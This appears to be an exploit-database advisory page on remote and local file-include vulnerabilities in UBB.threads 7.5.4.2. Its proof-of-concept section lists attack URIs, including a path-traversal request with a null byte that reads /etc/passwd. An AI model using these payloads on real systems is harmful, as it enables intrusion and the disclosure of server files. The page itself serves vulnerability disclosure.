header-logo
Suggest Exploit
vendor:
UBB.threads
by:
Unknown
6.4
CVSS
MEDIUM
File Include Vulnerabilities
94
CWE
Product Name: UBB.threads
Affected Version From: UBB.threads 7.5.4.2
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Browser
Unknown

UBB.threads File Include Vulnerabilities

UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible. An attacker can exploit these issues via a browser. The following example URIs are available: http://server/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI] http://server/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI] http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

UBBCentral: http://www.ubbcentral.com/

UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

UBB.threads 7.5.4.2 is vulnerable; other versions may also be affected. 

POC:
An attacker can exploit these issues via a browser.

The following example URIs are available:

http://server/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI]
http://server/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI]
http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00